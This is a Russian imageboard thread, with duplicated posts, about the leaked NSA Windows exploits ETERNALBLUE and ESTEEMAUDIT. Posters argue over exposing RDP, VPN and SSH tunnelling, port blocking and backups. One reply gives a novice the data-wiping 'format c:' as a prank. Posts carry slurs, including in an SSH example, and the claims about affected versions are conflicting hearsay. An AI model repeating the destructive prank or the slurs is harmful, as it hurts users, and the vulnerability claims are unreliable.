И все такое няшное, все с remote code execution
>Обновляюсь, но вешать ничего не буду, ибо это костыли.
Ну мое дело сообщить, что с этой информацией кто будет делать - его проблемы.
Я бы вообще не стал ни одного нативного порта высовывать наружу. Туннель не проблема, vpn не проблема, ясно, что не так удобно, но увы, не то время, чтобы радоваться удобствам.
>>151216301
>По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит?
Вроде как все (от xp до 8.1 и соответственно 2008r2 точно). Насчет десятки не уверен, но знакомые говорят, что подтверждается на 2012 сервере, так что я бы не рисковал.
Ответы151217013
62 Кб, 400x400
>>151184817 (OP)
Как вы этой дрянью вообще пользоваться можете? Однажды пришлось ходить через виндовый сервер с rdp - как говна пожрал.
SSH:
$ ssh -t nigger@gate ssh faggot@target
Винда:
Открываешь RDP клиент. Отдельным окном, ясен хуй. Какой tmux, какой screen?
Ждем пока все откроется
На столе находим 'Shortcut to YOBASHELL.EXE' (хули не putty, но ладно)
Ждем
This software trial period has expired.
Ждем еще
Ищем так кнопку, потом еще одну, слышим крик из соседнего загона что ему тоже на этот сервер надо, а заходить можно по одному (там наверно типа секурно так настроено было, я не верю что ОС в 2017 году может быть таким тупым говном). Ищем дальше. 5 окон, 5 тулбаров, вкладочки, закладочки (ибо шелла с Ctrl-R не завезли), какая-то еще поебень.
Наконец открывается терминал целевой машины. Который занимает 60% от всего RDP окна.
Clipboard'ы, естественно, не работают
Ебануть порты? Редиректнуть ввод/вывод с локалхоста? SCP? Agent? Хуй знает где.
Через пять минут приходится освобождать этот нужник, ведь другим тоже в ту сеть надо.
Зато ТАЙЛЫ и ПЕЙНТ есть. Обои еще поменять можно.
>дедик с виртуалкой и доступом по рдп.
>доступом по рдп.
Как вы этой дрянью вообще пользоваться можете? Однажды пришлось ходить через виндовый сервер с rdp - как говна пожрал.
SSH:
$ ssh -t nigger@gate ssh faggot@target
Винда:
Открываешь RDP клиент. Отдельным окном, ясен хуй. Какой tmux, какой screen?
Ждем пока все откроется
На столе находим 'Shortcut to YOBASHELL.EXE' (хули не putty, но ладно)
Ждем
This software trial period has expired.
Ждем еще
Ищем так кнопку, потом еще одну, слышим крик из соседнего загона что ему тоже на этот сервер надо, а заходить можно по одному (там наверно типа секурно так настроено было, я не верю что ОС в 2017 году может быть таким тупым говном). Ищем дальше. 5 окон, 5 тулбаров, вкладочки, закладочки (ибо шелла с Ctrl-R не завезли), какая-то еще поебень.
Наконец открывается терминал целевой машины. Который занимает 60% от всего RDP окна.
Clipboard'ы, естественно, не работают
Ебануть порты? Редиректнуть ввод/вывод с локалхоста? SCP? Agent? Хуй знает где.
Через пять минут приходится освобождать этот нужник, ведь другим тоже в ту сеть надо.
Зато ТАЙЛЫ и ПЕЙНТ есть. Обои еще поменять можно.
Ответы151216943
>>151216875
А вот не пизди, по rdp даже в игры можно играть по directx, если скорость канала позволяет. Другие решения там даже близко не стояли.
А вот не пизди, по rdp даже в игры можно играть по directx, если скорость канала позволяет. Другие решения там даже близко не стояли.
Ответы151217156
>>151186874
И шо?
И шо?
>>151216613
MS в своем стиле
>>151216637
Обычная практика это подключение в один клик. А костылить подключение через vpn не вариант
>Там сплошь решето
MS в своем стиле
>>151216637
>Какие блядь костыли, это обычная практика.
Обычная практика это подключение в один клик. А костылить подключение через vpn не вариант
Ответы151217105
>>151217013
Лол дебил. Одним кликом ты подключаешься к впн, вторым стартуешь рдп всё. Лишний клик ему лень сделать, зато будем сервак голой жопой выставлять в глобал, какой пиздец.
Лол дебил. Одним кликом ты подключаешься к впн, вторым стартуешь рдп всё. Лишний клик ему лень сделать, зато будем сервак голой жопой выставлять в глобал, какой пиздец.
Ответы151217217
>>151217105
Это как все на домашней тачке-то сделать с обычной home виндой? Я даж и не знаю. А рдп очен просто включается.
мимокрок
Это как все на домашней тачке-то сделать с обычной home виндой? Я даж и не знаю. А рдп очен просто включается.
мимокрок
>>151217156
В натуре, я в кваки по rdp гонял. Он даже графические ускорители поддерживает.
В натуре, я в кваки по rdp гонял. Он даже графические ускорители поддерживает.
>>151217187
Домашняя тачка не предназначена быть впн-сервером.
Домашняя тачка не предназначена быть впн-сервером.
>>151216597
>>151216613
Ммм. Понятненько. Зойпилите в тред ман для спермы, чтобы rdp слушал только впн интерфейс.
>>151216613
>Вроде как все (от xp до 8.1 и соответственно 2008r2 точно).
Ммм. Понятненько. Зойпилите в тред ман для спермы, чтобы rdp слушал только впн интерфейс.
>>151217282
Ну значит нахуй идет впн-сервер. Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
Ну значит нахуй идет впн-сервер. Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
>>151217187
tinc какой-нибудь накати
tinc какой-нибудь накати
Ответы151217355
>>151217105
Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.
Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.
Ответы151217634
>>151217333
Попробую.
Попробую.
>>151217328
Зато с дырами, азаза.
Зато с дырами, азаза.
Ответы151217496
>>151217282
Лолшто. Домашняя тачка как раз и предназначена любое говно туда пихать.
>не предназначена
>Домашняя тачка
Лолшто. Домашняя тачка как раз и предназначена любое говно туда пихать.
>>151217328
Нет, значит нахуй пойдёшь ты, когда тебя поимеет эксплоит АНБ, лол.
Нет, значит нахуй пойдёшь ты, когда тебя поимеет эксплоит АНБ, лол.
Ответы151217705
>>151213550
Что за rdp?
Что за rdp?
2045 Кб, 330x204
>>151217375
Смотрите все, я у мамы крутой хакир и неуловимый джо в одном флаконе, впн умею настраивать.
>Зато с дырами, азаза.
Смотрите все, я у мамы крутой хакир и неуловимый джо в одном флаконе, впн умею настраивать.
Ответы151217803
>>151217472
Анальный зонд в винде встроенный.
Анальный зонд в винде встроенный.
>>151217328
Ну, может кому-то нравится выставлять голую жопу в окно, за которой летают стаи хуёв, и надеяться, что ни один из них не воткнётся.
>Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
Ну, может кому-то нравится выставлять голую жопу в окно, за которой летают стаи хуёв, и надеяться, что ни один из них не воткнётся.
>>151217340
Да там настройка вся в два клика, что за костыли?
Лишний раз перед коннектом на иконке щелкнуть?
С ssh сервером я по привычке. Чего сложного - на винде поднял, ключи создал, по клиентам раскидал.
Коннект - прокидываешь изнутри свой любимый порт 3389 на любой локальный, к нему же и коннектишься по rdp
Два клика.
VPN тоже не ядерная физика, есть же готовые решения, один раз прочитал - пользуйся.
Если у тебя сотрудники по удаленке к серверу коннектятся - то только так.
Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти можно было без проблем на нее зайти, так-то удобно.
На рабочем серваке так делать нельзя никак.
>Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.
Да там настройка вся в два клика, что за костыли?
Лишний раз перед коннектом на иконке щелкнуть?
С ssh сервером я по привычке. Чего сложного - на винде поднял, ключи создал, по клиентам раскидал.
Коннект - прокидываешь изнутри свой любимый порт 3389 на любой локальный, к нему же и коннектишься по rdp
Два клика.
VPN тоже не ядерная физика, есть же готовые решения, один раз прочитал - пользуйся.
Если у тебя сотрудники по удаленке к серверу коннектятся - то только так.
Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти можно было без проблем на нее зайти, так-то удобно.
На рабочем серваке так делать нельзя никак.
Ответы151217847
>>151217472
Remote Desktop - встроенная удаленка в винде.
Remote Desktop - встроенная удаленка в винде.
>>151217705
То есть ты даже не скрываешь, что АНБ следит?
То есть ты даже не скрываешь, что АНБ следит?
Ответы151217917
>>151217705
Эталонный жопочтец. Конкретно ты никому не нужен. Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
Эталонный жопочтец. Конкретно ты никому не нужен. Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
>>151217773
Боты будут знать, что я жопу щекочу?
Боты будут знать, что я жопу щекочу?
Ответы151217869
>>151217634
В 2 клика? Там пердолиться надо неслабо.
Ебать, еще с ключами я дела не имел. Во времена двухфакторной аутентификации для людей я буду еще ключи таскать.
Так и у меня сервак для личного пользования и работы и что бы удобно было откуда угодно зайти. Естественно никаких критичных данных не хранится, поэтому и не пердолюсь. Если бы хранились то конечно бы сделал подключение через vpn.
>Да там настройка вся в два клика, что за костыли?
В 2 клика? Там пердолиться надо неслабо.
>Чего сложного - на винде поднял, ключи создал, по клиентам раскидал
Ебать, еще с ключами я дела не имел. Во времена двухфакторной аутентификации для людей я буду еще ключи таскать.
>Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти
Так и у меня сервак для личного пользования и работы и что бы удобно было откуда угодно зайти. Естественно никаких критичных данных не хранится, поэтому и не пердолюсь. Если бы хранились то конечно бы сделал подключение через vpn.
Ответы151217908
>>151217810
Нет, боты сделают так, что тебе больше не на что будет жопу щекотать. Утром проснешься и увидишь, что все твои animal-gay-porn.jpg уже не .jpg.
Нет, боты сделают так, что тебе больше не на что будет жопу щекотать. Утром проснешься и увидишь, что все твои animal-gay-porn.jpg уже не .jpg.
Ответы151217905
>>151217869
У меня бэкап есть на дивиди.
У меня бэкап есть на дивиди.
Ответы151217937
>>151217728
Лол. Это и есть эксплойты, утекшие из АНБ
>>151217773
this
С одной стороны боты и вирусняки типа kido
А с другой стороны - скрипткидди и любой желающий васян по гайдам из инета. их уже наснимали за пару дней вагон https://www.youtube.com/watch?v=HeFtRv1aDZU
Так что новый виток спермоболи впереди.
Лол. Это и есть эксплойты, утекшие из АНБ
>>151217773
>Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
this
С одной стороны боты и вирусняки типа kido
А с другой стороны - скрипткидди и любой желающий васян по гайдам из инета. их уже наснимали за пару дней вагон https://www.youtube.com/watch?v=HeFtRv1aDZU
Так что новый виток спермоболи впереди.
Ответы151218013
>>151217908
Да самому себе отсосать легче, чем накостылять двухфакторку в rdp
>Так прикрути ее и к себе, хуле как маленький.
Да самому себе отсосать легче, чем накостылять двухфакторку в rdp
Ответы151217971
>>151217937
Нахуй в рдп, делай ее в впн, если так хочется.
Нахуй в рдп, делай ее в впн, если так хочется.
Ответы151218028
Делайте самоуничтожающийся контейнер. Как вошел, просит код, ввел один раз не правильно - уничтожился.
Ответы151218055
>>151217917
Лол, кто бы мог подумать что win10 с принудительными автообновлениями вполне себе годнота
>Так что новый виток спермоболи впереди.
Лол, кто бы мог подумать что win10 с принудительными автообновлениями вполне себе годнота
>>151217971
впн с двухфакторкой? наркоман что-ли?
впн с двухфакторкой? наркоман что-ли?
>>151218028
Впн с двухфакторкой в самоунитожающемся контейнере.
Впн с двухфакторкой в самоунитожающемся контейнере.
>>151218008
Кинца про ХаКиРоВ насмотрелся?
Кинца про ХаКиРоВ насмотрелся?
Ответы151219364
Так, ладно. Я почти ничего не понимаю в кудахтерах, но тред напряг. Как себя обезопасить от этой срани?
>>151218028
Ну если уж так хочется двухфакторку, то хуле б нет. Вообще двухфакторка это и есть костыль для долбоебов, не могущих в ключи и сертификаты, проще смску вбить.
Ну если уж так хочется двухфакторку, то хуле б нет. Вообще двухфакторка это и есть костыль для долбоебов, не могущих в ключи и сертификаты, проще смску вбить.
Ответы151218115
>>151218061
Самое простое - не выключать автообновление винды.
Самое простое - не выключать автообновление винды.
>>151218013
Два стула.жпг
Два стула.жпг
>>151218061
format c: попробуй
format c: попробуй
>>151218013
Это только то, что утекло. А сколько того, что не утекло?
Это только то, что утекло. А сколько того, что не утекло?
Ответы151218158
>>151218081
А подробнее? Я все равно ничего не понял.
А подробнее? Я все равно ничего не понял.
>>151218061
Отключи компьютер от сети
>>151218072
Ебал я ваши ключи и сертификаты. Технологии, ограничивающие удобство не нужны.
>Как себя обезопасить от этой срани?
Отключи компьютер от сети
>>151218072
>костыль для долбоебов, не могущих в ключи и сертификаты
Ебал я ваши ключи и сертификаты. Технологии, ограничивающие удобство не нужны.
>>151218112
Линукс короче ставишь, винду сносишь.
Линукс короче ставишь, винду сносишь.
Ответы151218211
10ко богам похуй
Ответы151218170
>>151218115
Так нахуй вообще двух- или однофакторка. Убери пароли вообще, их так неудобно вводить.
>Технологии, ограничивающие удобство не нужны.
Так нахуй вообще двух- или однофакторка. Убери пароли вообще, их так неудобно вводить.
Ответы151218211
>>151218110
С таким подходом тебе нужно отключить всё электричество в квартире и надеть шапочку из фольги, вдруг пришельцы по торсионным полям твои мысли читают.
>Это только то, что утекло. А сколько того, что не утекло?
С таким подходом тебе нужно отключить всё электричество в квартире и надеть шапочку из фольги, вдруг пришельцы по торсионным полям твои мысли читают.
>>151218149
В 10ке просто дыры поновее встроили, которые еще через 5 лет опубликуют.
В 10ке просто дыры поновее встроили, которые еще через 5 лет опубликуют.
>>151184817 (OP)
Эникеи, ты хотел сказать?
>В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
>виндоадмины
>админы
Эникеи, ты хотел сказать?
>>151218158
Пришельцы знают, что я жопу щекочу.
Пришельцы знают, что я жопу щекочу.
>>151218158
Мне похуй. Пиздить мои данные никому не надо, а что до их уничтожения, ну так у меня полные бэкапы в сейфе лежат.
Мне похуй. Пиздить мои данные никому не надо, а что до их уничтожения, ну так у меня полные бэкапы в сейфе лежат.
>>151218190
А, ну да, тру админы только питуксы админят.
А, ну да, тру админы только питуксы админят.
>>151218188
Они не нужны, по ним васяны лезут комп хакать.
Они не нужны, по ним васяны лезут комп хакать.
>>151218148
Накати себе шапочку из фолги, псина
>>151218155
Лучше паролей еще ничего не придумали
>Это руки из жопы удобство ограничивают
Накати себе шапочку из фолги, псина
>>151218155
>Убери пароли вообще, их так неудобно вводить.
Лучше паролей еще ничего не придумали
>>151218188
Через исходящие. Или у тебя железный фаервол 91 года, не могущий в TCP?
Через исходящие. Или у тебя железный фаервол 91 года, не могущий в TCP?
>>151184817 (OP)
Среднестатистическому юзеру за NANом похуй. Проблема больше касается серваков с белым ip смотрящим в инет.
Среднестатистическому юзеру за NANом похуй. Проблема больше касается серваков с белым ip смотрящим в инет.
Ответы151218281
Ставьте впн по отпечатку пальца, боты не сломают.
>>151218197
Вот к этому мы и приходим, что все эти ваши rdp over vpn over ssh over tor нахуй никому не упали
>Пиздить мои данные никому не надо
Вот к этому мы и приходим, что все эти ваши rdp over vpn over ssh over tor нахуй никому не упали
Ответы151218298
>>151218254
Некоторые ISP внезапно белый IP дают.
Некоторые ISP внезапно белый IP дают.
>>151218276
Вдруг они запишут, как я тян ебу.
Вдруг они запишут, как я тян ебу.
>>151218298
Кому ты нахуй нужен, с террабайтами-то доступного порно
Кому ты нахуй нужен, с террабайтами-то доступного порно
>>151218298
Двухфакторно ебешь, через тор по ssh.
Двухфакторно ебешь, через тор по ssh.
Ответы151218353
>>151218197
>так никто твои данные пиздить и не будет. Ясен хуй. Будут просто DDoS/спам/proxy через тебя гнать.
>>151218330
Воображаемую тян.
Воображаемую тян.
Вот нашел на реддите
Если у меня закрыты эти порты, то я в безопасности?
>block all incoming connections destined for port 137-139, 445, and 3389
Если у меня закрыты эти порты, то я в безопасности?
>>151218190
Эникеи, ламеры - да как не назови. Речь не о том, проблема-то реально серьезная, а люди пока еше не вдуплили в ее возможные последствия.
Можешь обклеить все стены сертификами и гордиться, этот тред не для тебя.
Я его создавал, чтобы как можно больше народа, использующего такие схемы подключения оглянулись и почуяли огромный член, крадущийся к их жопе.
Эникеи, ламеры - да как не назови. Речь не о том, проблема-то реально серьезная, а люди пока еше не вдуплили в ее возможные последствия.
Можешь обклеить все стены сертификами и гордиться, этот тред не для тебя.
Я его создавал, чтобы как можно больше народа, использующего такие схемы подключения оглянулись и почуяли огромный член, крадущийся к их жопе.
Ответы151218423
>>151218372
Ну попиздят у них данных, ниче страшного, сто раз уж пиздили.
Ну попиздят у них данных, ниче страшного, сто раз уж пиздили.
Ответы151218629
>>151218370
Режь вообще все incoming, ибо нехуй.
Открой только несколько случайных портов >32000 - будешь через них торренты/FTP гонять.
И UPnP тоже нахуй сразу
Режь вообще все incoming, ибо нехуй.
Открой только несколько случайных портов >32000 - будешь через них торренты/FTP гонять.
И UPnP тоже нахуй сразу
>>151218370
Ох блядь, сколько еще дыр найдут в SMB, я еще msblast помню, а до него этот, забыл как называется, для винды 95-98.
>137-139, 445
Ох блядь, сколько еще дыр найдут в SMB, я еще msblast помню, а до него этот, забыл как называется, для винды 95-98.
Кому вы нахуй нужны ?..........
Ответы151218486
>>151218474
ботнетам
ботнетам
>>151218454
В редмонде старая школа, дыр на века вперед встроила.
В редмонде старая школа, дыр на века вперед встроила.
>>151218454
Так оно для интернета и не предназначено, только для корпоративной сети с казенными компами.
Еще можно о несекурности telnet'а поплакать и дыры в rsh поискать.
Так оно для интернета и не предназначено, только для корпоративной сети с казенными компами.
Еще можно о несекурности telnet'а поплакать и дыры в rsh поискать.
>>151218370
На роутере? Снаружи, из интернета - да.
Но тут момент - если у тебя в локалке домашней расшарены папки, то может прилететь с соседнего компа.
Если включен upnp - тоже есть шанс, что какой-нибудь крек от васяна откроет.
Так то по сути вернулись во времена RPC DCOM эксплойтов, когда эникеи носились от компа к компу в локалке мелких контор.
Сейчас грядет повторение.
>>151218423
Некоторые делают для удобства себе дырку на рабочий сервак. Сотрудникам поработать удаленно, самому залезть и поправить что-то из дома. Таких наивных много.
А на серваке бухгалтерия, всякая такая параша - пиздык, и админко вешается на куске патчкорда. Большие объемы данных затрахаешься бекапить, к тому же, в мелкоконторах на ручках экономят, не то, что на NAS для бекапов.
На роутере? Снаружи, из интернета - да.
Но тут момент - если у тебя в локалке домашней расшарены папки, то может прилететь с соседнего компа.
Если включен upnp - тоже есть шанс, что какой-нибудь крек от васяна откроет.
Так то по сути вернулись во времена RPC DCOM эксплойтов, когда эникеи носились от компа к компу в локалке мелких контор.
Сейчас грядет повторение.
>>151218423
Некоторые делают для удобства себе дырку на рабочий сервак. Сотрудникам поработать удаленно, самому залезть и поправить что-то из дома. Таких наивных много.
А на серваке бухгалтерия, всякая такая параша - пиздык, и админко вешается на куске патчкорда. Большие объемы данных затрахаешься бекапить, к тому же, в мелкоконторах на ручках экономят, не то, что на NAS для бекапов.
>>151218629
Ну если автобэкап не настроили, то нахуй таких админов. Поувольняют, может научятся бэкапы ставить.
Ну если автобэкап не настроили, то нахуй таких админов. Поувольняют, может научятся бэкапы ставить.
Ответы151219001
>>151218629
Откуда в мелкоконторе большие объемы, там покупается юсб хард на терабайт и туда все бэкапится. Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
Откуда в мелкоконторе большие объемы, там покупается юсб хард на терабайт и туда все бэкапится. Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
>>151218727
Проиграл с этого хайтек решения
>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
Проиграл с этого хайтек решения
>>151218629
Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать. Если не осилили, то сами виноваты, это даже студент осилит.
Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать. Если не осилили, то сами виноваты, это даже студент осилит.
Ответы151218791
>>151218758
Ну предложи что-то сопоставимое по стоимости.
Ну предложи что-то сопоставимое по стоимости.
Ответы151218806
>>151218791
Под столом стоит.
Под столом стоит.
Ответы151218846
>>151218806
Откуда он там возьмется?
Откуда он там возьмется?
Ответы151218859
>>151218758
Эйргэп по-русски. Алсо, обнаружил, что Касперский изначально рубит соединения по 3389. ФСБ обо мне заботится?
Эйргэп по-русски. Алсо, обнаружил, что Касперский изначально рубит соединения по 3389. ФСБ обо мне заботится?
Ответы151218902
>>151218846
Соберут из старого говна с помоек.
Соберут из старого говна с помоек.
Ответы151218913
>>151218852
Касперский дохуя чего рубит. Скажем, он пихает свой https сертификат, чтобы трафик сканить.
Касперский дохуя чего рубит. Скажем, он пихает свой https сертификат, чтобы трафик сканить.
Ответы151218966
>>151218859
Кек, так обычно и бывает. У нас в конторе какой-то древний комп под бэкапы юзали, который хз кто из дому притащил. Жесткие диски просто в него тыкали.
Кек, так обычно и бывает. У нас в конторе какой-то древний комп под бэкапы юзали, который хз кто из дому притащил. Жесткие диски просто в него тыкали.
>>151218913
Такие конторы просто обязаны однажды попасть под вирусняк/эксплоит, который к хуям уебет данные. Только так начальники поймут, что бабло надо тратить не только на свои мерседесы.
Такие конторы просто обязаны однажды попасть под вирусняк/эксплоит, который к хуям уебет данные. Только так начальники поймут, что бабло надо тратить не только на свои мерседесы.
>>151218913
Ну хоть бэкапы были, в половине контор и этого нет.
Ну хоть бэкапы были, в половине контор и этого нет.
>>151218902
Это получается из-за Касперского у меня пинг с серваками еа 100?
Это получается из-за Касперского у меня пинг с серваками еа 100?
>>151218966
Очень может быть. Отруби его и проверь.
Очень может быть. Отруби его и проверь.
>>151218966
Угу, в кваку по сети играешь, а касперский твои ракеты на лету сканит.
Угу, в кваку по сети играешь, а касперский твои ракеты на лету сканит.
Snowden:"This is not a drill: #NSA exploits affecting many fully-patched Windows systems have been released to the wild. NSA did not warn Microsoft.
>>151218713
Василь семеныч, нам нас нужен для бекапов. Каждый день бухгалтерию и все эти писульки, что менеджеры настрочили.
Нужно 20к на диски. Как нахуй?
Что, изыскать свободные средства? Окай.джпг
>>151218727
База 1с десяток гигов, доки всякие инкрементально, пару ответственных машинок с ключами/криптопро/випнетами/говном_всяким - целиком образами, ибо затрахаешься если что восстанавливать.
Так-то немало для регулярных бекапов.
И именно в тот момент, вечером, пока на него сливается все, наработанное за неделю в порт кто-то негромко стучится...
Который собран из говна десятилетней выдержки?
Суть-то в том, что так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем.
>>151218713
>Ну если автобэкап не настроили, то нахуй таких админов.
Василь семеныч, нам нас нужен для бекапов. Каждый день бухгалтерию и все эти писульки, что менеджеры настрочили.
Нужно 20к на диски. Как нахуй?
Что, изыскать свободные средства? Окай.джпг
>>151218727
>Откуда в мелкоконторе большие объемы
База 1с десяток гигов, доки всякие инкрементально, пару ответственных машинок с ключами/криптопро/випнетами/говном_всяким - целиком образами, ибо затрахаешься если что восстанавливать.
Так-то немало для регулярных бекапов.
>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
И именно в тот момент, вечером, пока на него сливается все, наработанное за неделю в порт кто-то негромко стучится...
>Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать.
Который собран из говна десятилетней выдержки?
Суть-то в том, что так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем.
Ответы151219164
>>151218998
Надо им написать, чтоб курс ракет на правильный подправляли.
Надо им написать, чтоб курс ракет на правильный подправляли.
>>151218758
В моей прошлой конторе я делал бэкапы трижды. Один раз на NAS в соседнем офисе, зареганном на другую контору, второй раз просто на юсб хард постоянно подключенный к серверу, и третий раз на юсб хард, который начальник хранил в банковской ячейке (sic!)
В моей прошлой конторе я делал бэкапы трижды. Один раз на NAS в соседнем офисе, зареганном на другую контору, второй раз просто на юсб хард постоянно подключенный к серверу, и третий раз на юсб хард, который начальник хранил в банковской ячейке (sic!)
Ответы151219083
Так, поясните нормальному человеку шо мне надо нашаманить в роутере шоб ко мне не добрались хацкеры и не сломали систему.
>>151219031
Ну в банковской ячейке есть смысл, если какие-то совсем неизменяемые данные, типа ключей.
Ну в банковской ячейке есть смысл, если какие-то совсем неизменяемые данные, типа ключей.
24 Кб, 500x281
За корпоративные бекапы обсудили. С личными как быть? К примеру нужны шифрованные бекапы папок с личного пк и ssh, rdp серверов
>>151218998
Не, тупо стоишь и не жмутся кнопки.
Не, тупо стоишь и не жмутся кнопки.
Ответы151219285
>>151219001
У нормальных админов винды обновляются и не торчат голым RDP в интернет.
>так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем
У нормальных админов винды обновляются и не торчат голым RDP в интернет.
Ответы151219240
>>151219127
А в чем разница? Ставишь тот же NAS и делаешь.
А в чем разница? Ставишь тот же NAS и делаешь.
>>151219127
На личном mail.ru cloud же ставишь, и все туда бэкапится.
На личном mail.ru cloud же ставишь, и все туда бэкапится.
>>151219164
Еще раз, тред адресован всем, и нормальным, и ненормальным, и не админам совсем, кто открыл у себя порт рдп по гайду, чтобы из любого места на домашний комп заходить.
Кто-то прочитает и скажет - ну, я так никогда не делаю. Ок, молодец.
А кто-то уже сейчас рвет на жопке волосы и пытается вспомнить, когда он в последний раз делал бекап.
Еще раз, тред адресован всем, и нормальным, и ненормальным, и не админам совсем, кто открыл у себя порт рдп по гайду, чтобы из любого места на домашний комп заходить.
Кто-то прочитает и скажет - ну, я так никогда не делаю. Ок, молодец.
А кто-то уже сейчас рвет на жопке волосы и пытается вспомнить, когда он в последний раз делал бекап.
Ответы151219410
>>151219209
Анб через rdp почитают, фсб через mail.ru cloud. Все довольны.
Анб через rdp почитают, фсб через mail.ru cloud. Все довольны.
Ответы151219277
>>151219259
Там прога ж, которая сама бэкапит.
Там прога ж, которая сама бэкапит.
Ответы151219291
>>151219154
Мне гугол врет?
Мне гугол врет?
Ответы151219399
>>151219277
Софт от маил.сру использовать? нахуй
Софт от маил.сру использовать? нахуй
>>151219209
В том числе и свежезашифрованны файлы. Облако-то синхронизируется с твоей базовой папкой, что там лежит, то и в облаке будет.
К тому же майлру - ну как-то я даже не знаю, или ты заранее все к досмотру предъявляешь?
>На личном mail.ru cloud же ставишь, и все туда бэкапится.
В том числе и свежезашифрованны файлы. Облако-то синхронизируется с твоей базовой папкой, что там лежит, то и в облаке будет.
К тому же майлру - ну как-то я даже не знаю, или ты заранее все к досмотру предъявляешь?
>>151218055
Не сервер с тротилом, а контейнер самоуничтожающийся.
Хотя он не прав, левый хуй может зайти, и науничтожать к хуям всё
Не сервер с тротилом, а контейнер самоуничтожающийся.
Хотя он не прав, левый хуй может зайти, и науничтожать к хуям всё
278 Кб, 720x1280
>>151219285
Нет, твои глаза.
Нет, твои глаза.
>>151219240
Я этого не делал, у меня стоит тупо спермерка. Мне есть чего бояться?
>кто открыл у себя порт рдп по гайду
Я этого не делал, у меня стоит тупо спермерка. Мне есть чего бояться?
>>151219408
ключ B вроде
ключ B вроде
Ответы151219586
>>151219464
Ага, спасибо.
Ага, спасибо.
Бля, унылей занятия чем эти ваши сети с кулхацкингом не найти.
Ответы151219760
>>151219711
Ты вош догс не играл что ли?
Ты вош догс не играл что ли?
Ответы151219892
>>151219760
Это типа симулятор мытья собак?
Это типа симулятор мытья собак?
205 Кб, 400x368
>>151219892
Проиграл
Проиграл
>>151219892
Симулятор собак со вшами.
Симулятор собак со вшами.
>>151184817 (OP)
Там зеродей хоть один был?
Там зеродей хоть один был?
Ответы151220517
>>151184817 (OP)
Если на ip моего провайдера, через который я хожу в интернеты открыт 445 порт?
Если на ip моего провайдера, через который я хожу в интернеты открыт 445 порт?
Где блядь сорцы сплоитов? На гитхабе уже скомпилированные файлы.
Ответы151220451
>>151220376
Сырцы не слиты.
Сырцы не слиты.
Ответы151220462
>>151220451
Ахуенно. Ну ладно, буду реверсить ESTEEMAUDIT
Ахуенно. Ну ладно, буду реверсить ESTEEMAUDIT
>>151220077
CONFIRMED — ETERNALBLUE is a #0day RCE exploit that affects latest & updated Windows 2008 R2 SERVER VIA SMB and NBT!
https://twitter.com/hackerfantastic/status/852902728892375042
CONFIRMED — ETERNALBLUE is a #0day RCE exploit that affects latest & updated Windows 2008 R2 SERVER VIA SMB and NBT!
https://twitter.com/hackerfantastic/status/852902728892375042
>>151220613
Кидай свой IP - просканю порты тебе.
Кидай свой IP - просканю порты тебе.
>>151220750
Внешний же. Если ты за роутером не в режиме DMZ - то опасаться нужно только внутренних угроз+уязвимостей роутера(не врубать работу его вёб-морды в WAN как минимум)
Внешний же. Если ты за роутером не в режиме DMZ - то опасаться нужно только внутренних угроз+уязвимостей роутера(не врубать работу его вёб-морды в WAN как минимум)
>>151220613
Уязвима не только RDP, но и самба. И вообще - обновиться не проще?
Уязвима не только RDP, но и самба. И вообще - обновиться не проще?
Ответы151220932
проиграл в голос с опа долбаеба который даже не удосужился описание почитать
рдп эксплоит работает только для икспи и 2003 это старое говно и так ебут все кому не лень.
рдп эксплоит работает только для икспи и 2003 это старое говно и так ебут все кому не лень.
>>151220847
Самба уязвимость на всех виндах, акромя десятки(хотя некоторые источники пишут, что и 10 уязвима)
Самба уязвимость на всех виндах, акромя десятки(хотя некоторые источники пишут, что и 10 уязвима)
Ответы151220931
>>151220877
и много ты самбы жопой в инет видел лалка?
Большая часть спрятана за натом и порт специально пробрасывать никто не будет
Те немногие с дайрект айпи скорее всего заблокируются фаерволом. Алсо уже все топ антивирусы детектят это говно.
В общем оп треда обычный студент который вдруг ощутил ПРИЧАСТНОСТЬ к хакирам.
Сажа скрыл.
и много ты самбы жопой в инет видел лалка?
Большая часть спрятана за натом и порт специально пробрасывать никто не будет
Те немногие с дайрект айпи скорее всего заблокируются фаерволом. Алсо уже все топ антивирусы детектят это говно.
В общем оп треда обычный студент который вдруг ощутил ПРИЧАСТНОСТЬ к хакирам.
Сажа скрыл.
>>151220842
Падажжи, если я с компа по smb расшарил папку на другое устройство, я уязвим?
Падажжи, если я с компа по smb расшарил папку на другое устройство, я уязвим?
Ответы151220961
>>151220932
если ты дайрект ип имеешьчто сильно врядли. или ты специально форвардил порт за нат.
если ты дайрект ип имеешьчто сильно врядли. или ты специально форвардил порт за нат.
170 Кб, 1455x500
56 Кб, 596x438
>>151220847
https://www.bleepingcomputer.com/news/security/shadow-brokers-release-new-files-revealing-windows-exploits-swift-attacks/
https://www.bleepingcomputer.com/news/security/shadow-brokers-release-new-files-revealing-windows-exploits-swift-attacks/
Ответы151221104
>>151220847
тоже поржал с долбаебов.
